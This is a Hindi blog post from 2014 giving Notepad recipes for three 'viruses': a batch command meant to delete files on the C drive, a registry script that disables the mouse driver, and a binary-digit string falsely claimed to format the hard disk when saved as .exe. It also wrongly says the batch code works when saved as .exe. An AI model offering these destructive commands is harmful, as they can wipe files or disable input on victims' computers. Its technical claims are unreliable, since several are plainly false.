सामान खरीदने के लिए बाॅक्स में सामान का नाम टाइप करें

सामान खरीदने के लिए बाॅक्स में सामान का नाम टाइप करें

रविवार, 9 मार्च 2014

आओ खुद से बनाये कंप्यूटर वायरस

 कंप्यूटर वायरस.... यह नाम सुनते ही हमें अपने कंप्यूटर में रखी फाइलों को सुरक्षित करने का ख्याल आ जाता है. एक वायरस हमें ना जाने कितना नुक्सान पंहुचा सकती है. इसका अंदाजा लगाना बहुत मुश्किल है. कंप्यूटर की सारी फाइल और हमारा जरुरी डॉक्यूमेंट...पलक झपकते ही सब गायब. फिर खोजते रहिये अपना फाइल. परेशानी अलग से. बॉस की डांट फ्री में. फिर कंप्यूटर की रिकवर प्रोसेस में डालिए, तब कहीं जाकर आपकी फाइल आपको वापस मिलती है. क्या आप जानते हैं यह कंप्यूटर वायरस कैसे बनता है. मैं आज आपको कुछ वायरस बनाने का ट्रिक बता रहा हूँ, इसके लिए किसी ख़ास प्रोग्राम की जरुरत नहीं है, बस नोटपैड ही काफी है. (सावधान : इस ट्रिक को आप अपने कंप्यूटर पर ना आजमाए, वर्ना आपकी सारी फाइल डिलीट हो सकती है. इसके लिए www.trickinhindi.blogspot.in यानी की Mera trick किसी भी प्रकार से जिम्मेदार नहीं होगा. )C ड्राइव को डिलीट करने वाला Virus

१. वायरस बनाने के लिए सबसे पहले अपना नोटपैड खोलें.

२. इसके बाद निचे दिए गए कोड को उसमे पेस्ट कर दें.

@Echo off
Del C:\ *.* |y

३. अब आप इसे virus.bat के नाम से सेव कर लें. आप चाहे तो इसे किसी भी नाम से सेव कर सकते हैं, लेकिन फाइल के नाम के अंत में .bat लगाना ना भूलें.

आपका एक वायरस तैयार हो चूका है, जो आपके C ड्राइव को पूरी तरह से ख़तम कर सकता है. (इसे अपने कंप्यूटर पर इस्तेमाल ना करें.) 

Hard Disk को फॉर्मेट करने वाला वायरस 

१. इसके लिए भी आपको पहले नोटपैड खोलना होगा.

२. इसके बाद निचे दिए हुए कोड को इसमें पेस्ट कर दें:

01001011000111110010010101010101010000011111100000  

३.इस नोटपैड फाइल को virus.exe के नाम से सेव कर लें.

इस वायरस को रन करने पर आपका Hard Disk पूरी तरह से format हो जायेगा. (इसे अपने कंप्यूटर पर इस्तेमाल ना करें.)  

Mouse को disable करने वाला वायरस 

१. इसके लिए भी आपको पहले नोटपैड खोलना होगा.

२. इसके बाद निचे दिए हुए कोड को इसमें पेस्ट कर दें:

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------

३.इस नोटपैड फाइल को virus.exe के नाम से सेव कर लें.

इस वायरस को रन करने पर आपका माउस काम करना बंद कर देगा. (इसे अपने कंप्यूटर पर इस्तेमाल ना करें.) 

1 टिप्पणी:

अगर आपको ये लेख पसंद आया हो तो अपने विचारों से जरुर अवगत कराएँ..

Related Posts Plugin for WordPress, Blogger...